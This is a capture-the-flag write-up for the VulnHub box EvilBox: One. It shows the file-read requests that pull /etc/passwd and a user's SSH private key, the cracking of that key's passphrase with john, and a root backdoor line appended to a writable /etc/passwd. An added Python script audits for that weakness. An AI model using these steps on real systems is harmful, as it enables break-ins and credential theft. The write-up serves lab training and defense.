This is EVILBOX: ONE from VulnHub.

I’ve been busy, super tired and yeah whatever, let’s make excuses. Nah. This box is rated easy and it is genuinely easy.

Ports

HTTP and SSH.

HTTP

Quick bit of feroxbusting:

┌──(root💀kali)-[/opt/vulnhub/evilbox]
└─# feroxbuster -u http://192.168.1.92 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 200 -C 403 -x txt,php,log,bak

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.1.92
 🚀  Threads               │ 200
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 💢  Status Code Filters   │ [403]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [txt, php, log, bak]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200      368l      933w    10701c http://192.168.1.92/index.html
200        1l        2w       12c http://192.168.1.92/robots.txt
301        9l       28w      313c http://192.168.1.92/secret
200        0l        0w        0c http://192.168.1.92/secret/evil.php
200        4l        0w        4c http://192.168.1.92/secret/index.html
[####################] - 14s   187440/187440  0s      found:5       errors:0      
[####################] - 8s     23430/23430   2786/s  http://192.168.1.92
[####################] - 12s    23430/23430   1855/s  http://192.168.1.92/secret

What does evil.php give us?

HTTP/1.1 200 OK
Date: Fri, 27 Aug 2021 11:06:32 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Not much. Let’s get fuzzing. I use Burp Turbo Intruder:

GET /secret/evil.php?%s=/etc/passwd HTTP/1.1

We find:

http://192.168.1.92/secret/evil.php?command=/etc/passwd

Works. /etc/passwd gives us a user, mowree. Let’s look for an SSH key:

GET /secret/evil.php?command=/home/mowree/.ssh/id_rsa HTTP/1.1

Yep, there is one, but it’s passphrase-protected. Copy it out and crack the passphrase:

┌──(root💀kali)-[/opt/vulnhub/evilbox]
└─# /usr/share/john/ssh2john.py id_rsa > id.john
┌──(root💀kali)-[/opt/vulnhub/evilbox]
└─# john id.john -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)

With the passphrase, we can SSH in as mowree.

Root

Check sudo -l: nope. Nothing in /etc/crontab, nothing else on the web, no other users. Run linpeas: /etc/passwd is writable.

mowree@EvilBoxOne:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
mowree@EvilBoxOne:/dev/shm$ su root2
Contraseña: 
root@EvilBoxOne:/dev/shm# cd /root
root@EvilBoxOne:~# id;hostname;date
uid=0(root) gid=0(root) grupos=0(root)
EvilBoxOne
vie ago 27 13:13:29 CEST 2021
root@EvilBoxOne:~# ls -lash
total 24K
4,0K drwx------  3 root 4,0K ago 16 13:06 .
4,0K drwxr-xr-x 18 root 4,0K ago 16 11:16 ..
   0 lrwxrwxrwx  1 root    9 ago 16 13:06 .bash_history -> /dev/null
4,0K -rw-r--r--  1 root 3,5K ago 16 11:20 .bashrc
4,0K drwxr-xr-x  3 root 4,0K ago 16 11:40 .local
4,0K -rw-r--r--  1 root  148 ago 17  2015 .profile
4,0K -r--------  1 root   31 ago 16 12:57 root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~#
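Since su read the hash straight out of /etc/passwd here (the field was not x, so /etc/shadow was never consulted), the fix is to make sure the file is not writable and carries no such entries. Here is an added Python audit for that, not part of the original writeup; it flags a group- or world-writable /etc/passwd, any UID 0 account other than root, and any password field holding a hash, and the sample file it runs on is constructed, reusing the root2 line from above.

```python
"""Audit /etc/passwd for what was abused on this box: a file writable by
non-root users, and extra UID-0 accounts carrying a crypt(3) hash directly in
the password field, which sidesteps /etc/shadow entirely."""
import os
import stat

def parse_passwd(text):
    """Yield (name, pw, uid) per line; uid is None for malformed lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            yield (fields[0], None, None)
            continue
        yield (fields[0], fields[1], int(fields[2]))

def audit_passwd(text, mode=None):
    """Return (finding, subject) tuples. `mode` is the file's st_mode from
    os.stat, or None to skip the permission check."""
    findings = []
    if mode is not None and mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("writable-by-non-root", "/etc/passwd"))
    for name, pw, uid in parse_passwd(text):
        if uid is None:
            findings.append(("malformed-line", name))
        elif uid == 0 and name != "root":
            findings.append(("extra-uid0-account", name))
        # "x" means the hash lives in /etc/shadow; "*", "!" and "" lock the
        # account; anything else is a hash that su/login will use directly.
        if uid is not None and pw not in ("x", "*", "!", "!!", ""):
            findings.append(("hash-in-passwd", name))
    return findings

def audit_file(path="/etc/passwd"):
    """Run the audit on a real file, including its permission bits."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read(), os.stat(path).st_mode)

# Constructed sample: a clean Debian-style file plus the line appended on this box.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, mode=0o100666):
        print(*finding)
```

Run audit_file() as root on a live host; a clean system returns an empty list.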